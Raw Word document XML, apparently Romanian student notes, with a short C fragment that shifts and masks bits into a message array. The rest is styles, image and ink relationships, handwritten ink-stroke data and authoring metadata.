      <w:r w:rsidRPr="005644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5644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restul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005644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5644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bitilor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A4CFA01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r w:rsidRPr="005644F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mask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&gt;&gt;=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6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;</w:t>
      </w:r>
      <w:r w:rsidRPr="005644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// ii </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005644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mutam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005644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pe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005644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pozitia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005644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5644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cea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005644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5644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mai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005644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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005644F2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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>nesemnificativa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="061FCDB6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0D236E53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r w:rsidRPr="005644F2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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>msg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[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005644F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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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5644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&amp;=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color w:val="FEDE5D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>~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(</w:t>
      </w:r>
      <w:r w:rsidRPr="005644F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0b00000011</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="234C2A44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r w:rsidRPr="005644F2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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>msg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[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005644F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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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] </w:t>
      </w:r>
      <w:r w:rsidRPr="005644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|=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gramStart"/>
      <w:r w:rsidRPr="005644F2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="FF7EDB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>mask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;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3BFE2A73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</w:p>
    <w:p w14:paraId="20AF5D03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        </w:t>
      </w:r>
      <w:r w:rsidRPr="005644F2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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>c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r w:rsidRPr="005644F2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&lt;&lt;=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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005644F2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="F97E72"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2</w:t>
      </w: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;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="029010C3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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDFC60E" w14:textId="77777777" w:rsidR="005644F2" w:rsidRPr="005644F2" w:rsidRDefault="005644F2" w:rsidP="005644F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</w:pPr>
      <w:r w:rsidRPr="005644F2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08709372" w14:textId="77777777" w:rsidR="005644F2" w:rsidRDefault="005644F2" w:rsidP="0071525C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34442A40" w14:textId="77777777" w:rsidR="005644F2" w:rsidRPr="00125785" w:rsidRDefault="005644F2" w:rsidP="0071525C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="005644F2" w:rsidRPr="00125785" w:rsidSect="00E73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5C093B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D3CF43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E317C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F72E398E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232C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D7BA72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11091C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D3CF4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DE7612"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C567B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997814">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="21711125">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2007054673">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1842159051">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="118790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B82"/>
    <w:rsid w:val="000012BB"/>
    <w:rsid w:val="00033D55"/>
    <w:rsid w:val="000A6B82"/>
    <w:rsid w:val="000E4314"/>
    <w:rsid w:val="00125785"/>
    <w:rsid w:val="00165015"/>
    <w:rsid w:val="00290642"/>
    <w:rsid w:val="003A4125"/>
    <w:rsid w:val="005644F2"/>
    <w:rsid w:val="0058117D"/>
    <w:rsid w:val="005A2A7F"/>
    <w:rsid w:val="005E1AD2"/>
    <w:rsid w:val="0071525C"/>
    <w:rsid w:val="00737C98"/>
    <w:rsid w:val="007924FC"/>
    <w:rsid w:val="009242BA"/>
    <w:rsid w:val="00B46619"/>
    <w:rsid w:val="00C43AB6"/>
    <w:rsid w:val="00D67D15"/>
    <w:rsid w:val="00DB27F0"/>
    <w:rsid w:val="00E32554"/>
    <w:rsid w:val="00E73B75"/>
    <w:rsid w:val="00FA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87795"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AB3F850A-C2D8-4418-8E12-0D2E70DD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C98"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titlu1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titlu1Caracter"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="000A6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A6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A6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A6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A6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A6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A6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A6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A6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A6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A6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A6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A6B82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A6B82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A6B8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A6B8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A6B8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A6B8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A6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A6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A6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A6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A6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A6B8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A6B8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A6B82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A6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A6B82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A6B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73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Fontdeparagrafimplicit"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E73B75"/>
    <w:rPr>
      <w:color w:val="467886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E73B75"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Antet">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="AntetCaracter"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00033D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033D55"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subsol">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="SubsolCaracter"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00033D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033D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2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2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0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9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1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4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image" Target="media/image150.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink5.xml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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink3.xml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a8bliKfM10&amp;t=9173s" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink1.xml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180.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23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customXml" Target="ink/ink4.xml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1T15:28:43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5336 2946 24575,'-106'-1'0,"-116"3"0,183 2 0,-71 19 0,38-6 0,-36 0-332,-45 11-226,109-20 317,0-1 0,-86 0 0,4 0-428,-330 3-463,284-12-196,-592 2 469,600-13 859,86 5 0,-83-14 0,26 3 0,-105-5 49,205 20 21,-49-13-1,53 10 295,-1 1-1,-32-1 1,17 2-181,-70-14 1,17 0 2981,-105-22-2375,-43-11-2231,24-18 1616,188 60 21,0-3 1,1-1-1,1-1 0,-46-28 1,69 35-163,1 0 0,0-1 1,0 0-1,1 0 0,0-1 0,1-1 1,0 1-1,-8-16 0,-3-9-55,-20-53 0,6 10 39,4 15-18,16 30 0,-2 2 0,-23-37 0,21 41 17,-17-40-1,22 40-359,-30-46 0,14 21 312,23 42 127,1 1 0,-1-1-1,-1 1 1,0 0 0,-7-9 0,1 3-81,1-2 0,1 1 0,0-2 0,1 1 0,1-1-1,-7-24 1,-8-13-10,16 35-5,0-1 0,1 1 0,1-2 0,1 1 0,1 0 0,1-1 0,0 1 0,3-29 0,-2 26 0,-1-1 0,-5-24 0,2 23 0,-1-42 0,6 34 0,2-79 0,0 106 0,0 0 0,0 0 0,1 0 0,0 0 0,1 0 0,-1 1 0,1 0 0,1-1 0,8-9 0,9-13 0,134-216 0,-74 127 0,-58 86 0,10-1 109,-14 15-1583,-11 9-5352</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="835.39">172 406 24575,'0'-5'0,"-1"0"0,2 0 0,-1-1 0,0 1 0,1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,1 0 0,-1 1 0,1-1 0,0 1 0,6-8 0,76-81 0,-22 30 0,-19 1 0,-30 41 0,26-31 0,-38 50 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,0-1 0,0 2 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1 1 0,0-1 0,0 0 0,-1 0 0,1 0 0,0 3 0,20 56 0,46 97 0,-7-45 0,-29-56-102,-8-15-319,-1 1 0,30 87 0,-48-116-6405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1T15:28:05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24575,'509'0'0,"-493"1"0,0 1 0,28 6 0,-26-4 0,-1-1 0,20 1 0,259-5-1365,-277 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1T15:30:38.4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762 1734 24575,'1'0'0,"0"0"0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 1 0,1-2 0,9-29 0,-6 17 0,4-2 0,-1-1 0,-1 0 0,-1-1 0,4-24 0,24-103 0,-12 58 0,-17 63 0,-1 1 0,-1-1 0,-2-27 0,-1 27 0,2 0 0,0 0 0,6-26 0,13-94 0,-10 66 0,-3-8 0,-6 52 0,8-37 0,-3 18 0,-1 0 0,-6-101 0,-1 54 0,2-132-1365,0 214-5461</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="758.63">721 273 24575,'3'-1'0,"0"0"0,1 0 0,-1 0 0,0-1 0,0 1 0,-1-1 0,1 0 0,5-4 0,5-2 0,112-78 0,-122 84 0,30-18 0,54-42 0,-75 52 0,1 0 0,-1 1 0,2 1 0,-1 0 0,1 1 0,25-10 0,-34 15 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,1 1 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 1 0,0-1 0,-1 1 0,1-1 0,-1 1 0,5 4 0,26 33 0,3 3 0,-13-20 0,33 41 0,-6-7 0,-4-9 0,44 48 0,-85-89-98,13 16-535,41 37-1,-51-52-6192</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="33008.03">1273 1711 24575,'-1'68'0,"3"76"0,19-38 0,1 0 0,-16-81 0,-3-18 0,-1-1 0,-1 1 0,1 0 0,0 10 0,-2-15 0,0-1 0,0 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,-1 1 0,-1 0 0,-66 24 0,47-19 0,0 2 0,0 1 0,-27 15 0,42-21 0,0 0 0,0 0 0,0 0 0,0-1 0,0 0 0,-1 0 0,1-1 0,-14 1 0,-67-4 0,39-1 0,-6 4 0,22 0 0,0-2 0,0 0 0,-55-12 0,52 8 0,0 0 0,-1 3 0,1 1 0,-43 4 0,-6-1 0,-4 0 0,-97-4 0,181 1 0,-1 0 0,1 0 0,-1 0 0,1-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,1-1 0,-1 0 0,-7-6 0,10 8 0,1 0 0,-1-1 0,1 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,3-3 0,7-7 0,0-1 0,1 2 0,1 0 0,17-13 0,20-17 0,74-86 0,-67 78 0,-47 43 0,0 0 0,0 0 0,1 1 0,-1 1 0,1 0 0,0 0 0,0 1 0,1 0 0,-1 1 0,15-1 0,19-5 0,61-12 0,-84 16 0,1 1 0,0 1 0,23 1 0,-23 1 0,-1-1 0,0-1 0,31-6 0,94-14 0,-125 18 0,0 1 0,28 0 0,-34 3 0,-1 0 0,1-2 0,0 0 0,-1 0 0,1-2 0,20-7 0,-24 6 0,2-1 0,0 0 0,0 1 0,0 0 0,0 1 0,1 1 0,-1 0 0,23-1 0,5 4-1365,-24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1T18:47:50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1993 5361 24575,'-38'1'0,"23"0"0,0 0 0,0-2 0,0 1 0,0-2 0,0 0 0,-28-8 0,-87-29 0,74 23 0,48 14-85,-33-10-226,-80-13-1,85 18 312,0-1 0,-55-20 0,-5-1 0,0 10 0,67 15 0,0-2 0,0 0 0,-35-14 0,-78-34 47,54 22-520,-100-51 1,130 51 717,2-3 0,1-3 0,-67-59 0,104 81 202,-65-60-268,70 61-179,0-1 0,1 0 0,-13-26 0,24 41 0,-9-15 0,1 1 0,1-1 0,1 0 0,0-1 0,1 0 0,1 0 0,-7-35 0,5 5 0,2 15 0,-3-57 0,7-3 0,4-136 0,17 101 0,-11 77 0,-4 25 0,3-48 0,-7 61 0,0 0 0,2 0 0,-1 0 0,1 1 0,8-17 0,-7 15 0,1-1 0,-1 1 0,3-22 0,1-16 0,2 1 0,17-50 0,-4 18 0,14-25 0,-28 78 0,0 1 0,25-50 0,-6 17 0,-23 48 0,8-18 0,22-40 0,12-38 0,-25 69 0,27-69 0,-44 98 0,0 1 0,0 0 0,13-17 0,8-17 0,40-74 0,-55 98 0,1 1 0,20-25 0,8-12 0,-11 18 0,-22 30 0,0 0 0,0-1 0,7-13 0,-4 4 0,1 1 0,16-19 0,15-24 0,-18 30 0,2-6 0,-19 24 0,1 1 0,0-1 0,0 2 0,12-12 0,1-2 0,87-88 0,-66 71 0,-25 26 0,1 0 0,31-19 0,-27 19 0,31-26 0,-36 27 0,1 1 0,24-14 0,-24 16 0,0-1 0,27-23 0,-37 29 0,0 0 0,1 1 0,-1-1 0,1 2 0,12-6 0,12-5 0,8-6 0,-28 15 0,0 0 0,0-1 0,17-12 0,-19 11 0,0 2 0,0 0 0,24-10 0,-7 4 0,22-7 0,-32 12 0,-1 0 0,22-12 0,-23 11 0,1 0 0,28-9 0,8-3 0,-36 13 0,0 1 0,18-3 0,-22 6 0,1-1 0,-1 0 0,0-1 0,18-9 0,-13 5 0,-1 1 0,1 1 0,30-7 0,3-2 0,-30 10 0,1 1 0,0 1 0,37-3 0,-33 5 0,-1-1 0,34-9 0,-12-3 0,-33 9 0,0 1 0,1 1 0,0 0 0,29-3 0,-8 4 0,60-15 0,-65 11 0,1 1 0,60-3 0,-56 7 0,41-6 0,-42 3 0,45-1 0,-59 5 0,1-1 0,-1-1 0,39-11 0,20-3 0,17 10 0,-64 6 0,49-8 0,129-22 0,-192 28 0,-1 0 0,1-2 0,-1-1 0,-1 0 0,24-11 0,-19 7 0,1 1 0,33-8 0,155-31 0,-199 45 0,0-1 0,0 0 0,11-6 0,-13 6 0,0 0 0,0 0 0,0 1 0,18-4 0,-3 3 0,48-15 0,-3 0 0,34-7 0,-15-12 0,-62 30 0,0 0 0,-1-2 0,32-16 0,14-20 0,9-5 0,-41 29 0,-23 11 0,1 2 0,21-9 0,-19 10 0,34-21 0,-38 20 0,0 0 0,1 1 0,25-8 0,-14 6 0,49-23 0,-50 20 0,60-19 0,-64 25 0,-1-1 0,0-1 0,-1-1 0,29-17 0,38-26 0,-42 17-1365,-37 26-5461</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="800.83">5590 6 24575,'103'2'0,"112"-4"0,-195-1 0,-16 2 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,1 0 0,-1 1 0,5 0 0,-7 1 0,1-1 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,1 4 0,23 56 0,-17-40 0,0 0 0,2-1 0,14 24 0,25 44 0,-25-31-1365,-18-46-5461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1T18:45:24.0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2 768 24575,'76'-1'0,"83"3"0,-89 8 0,-43-6 0,45 3 0,-40-5 0,38 6 0,-39-3 0,47 1 0,-47-4 0,54 9 0,-32-3 0,-2 2 0,-34-6 0,-1-1 0,27 2 0,-18-5 0,141-1 0,-110-10 0,-40 7 0,-1 1 0,25-1 0,70-7 0,13 0 0,-116 11 0,0-1 0,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 0 0,0-1 0,12-5 0,7-4 0,-13 9 0,0 0 0,1 0 0,-1 1 0,0 0 0,1 1 0,-1 1 0,25 2 0,-26-1 0,0 0 0,0-1 0,0 0 0,0-1 0,0 0 0,0-1 0,0 0 0,0-1 0,-1 0 0,15-6 0,-10 3 0,0-1 0,0 2 0,20-4 0,34-14 0,-15 5 0,-40 14 0,1-1 0,-2 0 0,16-9 0,-25 12 0,0 0 0,0-1 0,-1 1 0,1-1 0,-1 0 0,0 0 0,1-1 0,-2 1 0,1-1 0,0 1 0,-1-1 0,1 0 0,-1 0 0,3-7 0,0-4 0,0-1 0,-1 1 0,-1-1 0,-1 0 0,0 0 0,-1 0 0,0-1 0,-3-24 0,-1 19 0,-1 1 0,-1-1 0,-1 0 0,-1 1 0,-16-33 0,11 33 0,0 1 0,-1 0 0,-1 0 0,-1 2 0,-1 0 0,-21-19 0,30 31 0,0 0 0,0 1 0,0 0 0,-1 1 0,1-1 0,-1 1 0,0 1 0,-11-4 0,-10-2 0,-34-4 0,39 9 0,-1-2 0,-25-9 0,29 10 0,1 0 0,-1 1 0,-1 1 0,1 1 0,0 1 0,-1 1 0,-27 4 0,-16-2 0,-402-2 0,449 1 0,0 1 0,-26 6 0,-23 2 0,59-9 0,1 0 0,-1 0 0,1 1 0,-1 0 0,1 1 0,0-1 0,-10 7 0,-9 2 0,-51 15 0,-19 8 0,48-17 0,36-14 0,0 1 0,1 1 0,-14 6 0,16-7 0,1-1 0,-1 0 0,0 0 0,1-1 0,-1 0 0,0-1 0,-16 1 0,18-2 0,1 0 0,-1 0 0,1 1 0,-1 0 0,1 0 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 1 0,0 0 0,0 0 0,0 0 0,1 1 0,-11 8 0,-47 53 0,55-58 0,1 0 0,0 1 0,0 1 0,1-1 0,0 1 0,1 0 0,0 0 0,-4 12 0,-13 14-3772,3-5 760,-2 11 6404,-35 53 0,52-88-3506,0 0 1,0 1-1,0-1 0,1 1 0,0-1 1,0 1-1,1 0 0,0 1 0,0-1 1,0 0-1,0 11 0,1-1-6712</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1023.28">1570 1042 24575,'3'1'0,"0"0"0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,-1 0 0,5 4 0,2 2 0,21 15 0,-21-16 0,0 0 0,0 0 0,1-1 0,0 0 0,0 0 0,0-1 0,18 6 0,-5-4 0,0 2 0,33 18 0,3 1 0,341 133-659,-291-119 606,-83-32 53,131 58 0,-55-18 0,-50-26 0,86 55 0,-97-54-92,-32-20 165,0-1 1,-1 2-1,0-1 0,0 1 0,0 0 0,-1 1 0,1 0 0,-2 0 0,1 0 0,7 12 0,0 3-73,-7-11 0,0 1 0,-1-1 0,0 1 0,-1 0 0,5 17 0,18 57 0,-17-58 0,-2 1 0,7 39 0,-14-58 0,2 1 0,-1 0 0,1-1 0,1 0 0,6 12 0,-5-11 0,-1 1 0,1 0 0,4 18 0,37 133 0,-43-148 0,2 0 0,-1-1 0,15 26 0,8 21 0,-10-11 0,14 48 0,-25-77 0,1-1 0,12 26 0,-10-24 0,13 39 0,6 49 0,23 72 0,-46-157 0,0-1 0,-2 1 0,0 0 0,-1 36 0,3 18 0,15 161 0,-12-95-142,-9-107 42,2 0-1,2 0 0,10 48 1,-1-21-231,8 114 0,-16-119 273,5 30 164,6 128 313,-17 636 320,2-823-739,9 44 0,-5-43 0,1 43 0,-3-19 0,15 80 0,-1-13 0,5 10 0,-13-95 0,-3 0 0,4 71 0,-9-76 0,8 46 0,-4-44 0,1 39 0,4 54 0,1 11 0,-13-51 0,4 119 0,1-189-1365,1-5-5461</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1706.13">3475 7247 24575,'1'6'0,"0"1"0,0-1 0,1 0 0,0 0 0,0-1 0,0 1 0,1 0 0,0-1 0,0 1 0,0-1 0,1 0 0,5 6 0,1 2 0,2 0 0,0-1 0,17 14 0,7 2 0,-4-2 0,0-1 0,49 27 0,-41-29 0,-21-11 0,1-1 0,25 10 0,133 58 0,-78-33 0,-94-44 0,69 27 0,-70-27 0,0-1 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1-1 0,4-2 0,-8 2 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,-1 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0-4 0,1-6 0,-1 1 0,0-1 0,-1-13 0,1-14 0,36-111 0,-33 129 0,2 1 0,0 0 0,10-21 0,-7 19 0,12-45 0,21-80 0,-37 132 0,0 0 0,0 0 0,12-20 0,-9 19 0,-1 0 0,7-24 0,23-59 0,-18 52 0,48-109-1365,-62 142-5461</inkml:trace>
</inkml:ink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59</Pages>
  <Words>5644</Words>
  <Characters>32171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Manolache</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Catalina Manolache</cp:lastModifiedBy>
  <cp:revision>19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-02T13:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-02T16:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>